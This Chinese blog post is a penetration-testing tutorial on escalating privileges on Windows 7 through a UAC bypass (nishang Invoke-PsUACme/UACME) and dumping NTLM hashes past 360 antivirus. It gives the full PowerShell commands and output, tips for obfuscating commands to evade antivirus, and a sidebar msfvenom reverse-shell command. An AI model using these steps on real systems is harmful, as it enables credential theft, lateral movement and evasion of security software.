利用 UACME和ps混淆来bypass AV

最新推荐文章于 2024-08-09 07:28:23 发布
最新推荐文章于 2024-08-09 07:28:23 发布
阅读量3.4k 收藏
点赞数
分类专栏: web安全

0x00 前言


 

 

拿到一个服务器的低权限shell之后,一般的思路是提权-导hash-hash传递/17-010/14-068-找文件服务器-打域控,在这一整个链条中前两个提权/导hash也是经常遇坑的地方。本文需要介绍下如何在有Anti Virus的情况下实现提升权限并导出NTLM hash。


0x01 简介
 

l  Powershell bypassUAC执行命令

l  Powershell混淆绕过anti virus

l  Windows server 2008/win7 nt6内核系统


0x02 Powershell简介
 

而从2008/win7开始windwos引入了powershell,而powershell是什么?可以简单的认为powershell是利用.net的各类库来实现往常cmd不能实现的功能,基于其强大的功能,往往也成为一些安全软件与系统安全的短板。


0x03 实现过程
 

回到提权的问题上,在powershell上可以通过bypass uac的操作来绕过系统阻止的访问操作,将自己操作的权限提升到id:500的管理员。

https://www.cnblogs.com/Chesky/p/UAC_Bypass.html有关UAC的概念和bypass相关可以查看上文。这里使用nishang的Invoke-PsUACme.ps1脚本

 

 

https://github.com/hfiref0x/UACME通过dll注入bypass的。测试环境 windows 7

 

 

当前用户权限处于管理员组,但id非500的用户。上传/或者ps动态加载Invoke-PsUACme.ps1到文件/内存中这里为了判断是否成功提升了权限我使用Powerpreter.psm1来导出hash,可以先提前执行下Powerpreter.psm1可以看到权限不够无法导出hash而且AV会拦截并删除脚本:如下图

 

 

已经被拦截了。接下来我bypassuac后在利用执行导hash操作

01

02

03

04

05

06

07

08

09

10

Microsoft Windows [版本 6.1.7600]

版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\123>powershell -exe bypass

Windows PowerShell[/align][align=left]

版权所有 (C) 2009 Microsoft Corporation。保留所有权利。

PS C:\Users\123> Import-Module.\Desktop\Invoke-PsUACme.ps1

PS C:\Users\123> cd .\Desktop

PS C:\Users\123\Desktop>  Invoke-PsUACme -method oobe -Payload"powershell -exE

bypass Import-Module C:\Users\123\Desktop\Powerpreter.psm1;Get-PassHashes> C:\Users\123\Desktop\1.txt"

Using OOBE method

 

 

可以看到,360并没有对执行的命令进行拦截。

 

 

桌面上生成了1.txt代表命令成功的执行了。

 

 

可以看到 hash已经导出来了,在内网中接下来就是hash传递了。慢慢搞。


0x05 小结
 

这里再简单说下ps混淆,有的杀软对于编码混淆检查的比较严格,有的只是检查了参数传递的关键字,通过大小写,分号切割等方法都可以绕过,还有很多比如cs自动生成的ps命令,只需要控制将隐藏窗口控制台参数去掉就可以绕过火绒/等一些常见的国内av。有时间的话整理下ps混淆应对杀软的特点。

 

张悠悠66
关注
专栏目录
49-2 内网渗透 - 使用UACME Bypass UAC
weixin_43263566的博客
06-25 107
注意:这里是手动上传木马,如果是实际环境中需要用UAC这种方式提权,就需要通过钓鱼的手段上传,不能通过文件上传漏洞之类的。这里就是假设通过钓鱼的方式上传木马到目标服务器并且运行了,kali的msf能拿到会话了。到此就提权成功了,需要注意的是这种方式的提权只能通过钓鱼的方式上线的木马才能成功。因为我们不知道那个编号能让我们成功上线,那我们就将1-70全部执行一遍。回到我们之前拿到目标服务的msf会话中执行命令。尝试使用当前的管理员权限是否能够添加新用户。回到有目标服务器会话的终端,上传木马。
闲谈 bypass AV
Coisini的博客
06-23 4947
孩纸,看到AV别乱想~这里说的AV是AntiVirus。即杀软。(这些日子考试繁重,更的少了…) 本篇文章简单说一下本人平时常用的免杀工具以及其使用~ 0x00 Hyperion 第一个说说这个 Hyperion,因为比较轻量级~,为什么说轻量级呢,因为,360杀毒能检测出。。 其实 Hyperion 是一款加密工具,通过5轮AES加密来加密的你payload,加密完成后的payload是可以...
UACME - uac by pass工具,已编译版本。
03-22
UACME - uac by pass工具,已编译版本。可以直接使用。 项目源代码 、使用说明参考 https://github.com/hfiref0x/UACME 未对代码进行任何修改,直接进行了编译。 经测试好用。 版本 v 3.5.9
UACME 项目使用教程
gitblog_00154的博客
08-09 800
UACME 项目使用教程 UACMEDefeating Windows User Account Control项目地址:https://gitcode.com/gh_mirrors/ua/UACME 1. 项目的目录结构及介绍 UACME 项目的目录结构如下: UACME/ ├── Akagizuo/ ├── COMHijack/ ├── DefenderExclusions/ ├── Doc...
UACMe:突破Windows用户账户控制的利器
最新发布
gitblog_00582的博客
08-09 431
UACMe:突破Windows用户账户控制的利器 UACMEDefeating Windows User Account Control项目地址:https://gitcode.com/gh_mirrors/ua/UACME 项目介绍 UACMe是一款开源项目,专注于绕过Windows用户账户控制(UAC)机制。通过利用Windows内置的AutoElevate后门,UACMe能够实现对系统的高...
渗透工具UACMe:滥用内置的Windows AutoElevate后门
学习、分享、交流
04-23 4574
通过滥用内置的Windows AutoElevate后门来击败Windows用户帐户控制。
UACME, 禁用 Windows 用户帐户控制.zip
09-18
UACME, 禁用 Windows 用户帐户控制 UACMe防止 Windows 用户帐户控制滥用 Windows AutoElevate后门。系统要求x86-32/x64 Windows 7/8/8. 1/10 ( 客户端,但某些方法也适用于服务器版本) 。管理帐户在默认
bypass AV 探索一 .pdf
09-05
【标题】:“bypass AV 探索一 .pdf”探讨的是如何绕过反病毒软件(AV)的检测技术,主要集中在安全应急响应、渗透测试和漏洞分析的场景下。在企业安全领域,这样的技术对于安全对抗和安全管理具有重要意义。 ...
python调用msf_MSF利用python反弹shell-Bypass AV
weixin_39883079的博客
11-30 1619
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=...
Intel i211网卡和bypass设计
04-25
2. **控制机制**:通过微控制单元(MCU)来控制bypass机制。MCU能够监测网卡状态并根据预设程序执行bypass操作,将数据流路由到备用通道。 3. **硬件接口**:其中包括了PCIe接口(用于与计算机主板通信)、LED指示...
xssbypass_XSS易容术---bypass之编码混淆篇+辅助脚本编写
weixin_42377407的博客
12-23 429
一、前言本文原创作者:vk,本文属i春秋原创奖励计划,未经许可禁止转载!很多人对于XSS的了解不深。很多时候,我们的一些关键字被过滤。直接闭合前面payload,插入测试语句,是弹不出窗的。原因有很多,过滤方式也有很多,所以绕过的姿势自然也不少。今天跟大家分享bypass之编码混淆。二、正文1、总括很多时候,我们的一些关键字被过滤。直接闭合前面payload,插入测试语句alert(/xss/),...
UACME - uac by pass工具,已编译版本下载
11-17
UACME - uac by pass工具,已编译版本。可以直接使用。 项目源代码 、使用说明参考 https://github.com/hfiref0x/UACME 未对代码进行任何修改,直接进行了编译。 经测试好用。 版本 v 3.6.3
UACME:击败Windows用户帐户控制
01-31
UACME:击败Windows用户帐户控制
最新网址大全源码,好123屌丝版网址导航
03-08
最新网址大全源码,好123屌丝版网址导航
【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限
xiaoheizi的博客
09-01 2285
1、具体有哪些权限需要我们了解掌握的?后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等2、以上常见权限获取方法简要归类说明?后台权限:SQL注入数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限:SQL注入数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。
推荐开源项目:uacme——轻量级ACMEv2客户端
gitblog_00065的博客
05-23 466
推荐开源项目:uacme——轻量级ACMEv2客户端 uacmeACMEv2 client written in plain C with minimal dependencies项目地址:https://gitcode.com/gh_mirrors/uac/uacme ACME(Automated Certificate Management Environment)协议的实现通常是复杂且资源...
UACME】在Win11上的发展
溡漪幽博客
01-14 718
(1)在Win11(22H2 22621.1105最新发布版)上,有些方法已经被修复,现在还能够在裸机上绕过UAC的方法序号为:33 41 43 53 59 61 62 70 73。在AV机器上,COM组件提权会被AV的Hook拦截,绕过方法为:被闲置的COM组件调用在恢复时会被过滤掉,***;注册表修改绕过UAC也会被AV查杀,绕过注册表监控的方法就是****。方法:在操作前关闭资源管理器,这个消息不是由安全与维护(操作中心)发出的,而是explorer自身发出的。
bypass和非bypass区别
05-18
Bypass和非Bypass是指计算机网络中的两种不同路由方式。 Bypass是一种路由方式,也称为直通式路由。当网络设备(如防火墙、负载均衡器等)出现故障或维护时,通过Bypass可以让网络流量直接绕过这些设备,而不会造成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值